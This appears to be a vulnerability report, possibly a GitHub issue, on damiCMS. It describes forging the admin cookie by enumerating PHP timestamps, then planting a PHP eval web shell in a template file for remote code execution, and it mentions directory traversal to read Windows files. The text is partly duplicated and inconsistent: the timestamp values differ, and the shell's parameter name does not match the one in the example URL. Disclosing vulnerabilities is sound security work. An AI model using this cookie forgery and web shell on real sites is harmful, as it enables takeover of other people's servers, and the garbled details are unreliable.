the BkGOp9578O_1535522538=czoxOiIxIjs%3D would be updated when admin logins in,
"BkGOp9578O_" is a COOKIE_PREFIX by default, "1533522538" comes from time() function in php, the cookie is valided for 3 hours, it means we can get the admin permission just by Enumerating maximum 10800 times if the admin logged In。
get a string by time() function
----genera.php <?php echo time();?>
PART 1 : get the admin authenticaton
Here is a default damiCMS's admin user's cookie:
Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; member_uid=1; finecms-admin-login=admin; member_cookie=c0600cb471b0f5b646d8; PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_1535522538=czoxOiIxIjs%3Dthe BkGOp9578O_1535522538=czoxOiIxIjs%3D would be updated when admin logins in,
"BkGOp9578O_" is a COOKIE_PREFIX by default, "1533522538" comes from time() function in php, the cookie is valided for 3 hours, it means we can get the admin permission just by Enumerating maximum 10800 times if the admin logged In。
get a string by time() function
----genera.php
<?php echo time();?>crafted a request
e.g.
BkGOp9578O_15355$22538$=czoxOiIxIjs%3DPART 2 : Remote Code Execution
when logined as a admin (By part1), There is a Remote Code Execution vulnerability
<?php @eval($_GET["code"]);?>./Web/Tpl/default/head.html
http://localhost:8899/damiCMS/index.php?cmd=phpinfo();
PART 3 : Directory Traversal
when logined as a admin (By part1), There is a Directory Traversal vulnerability
read the content of c:/windows/win.in
The text was updated successfully, but these errors were encountered: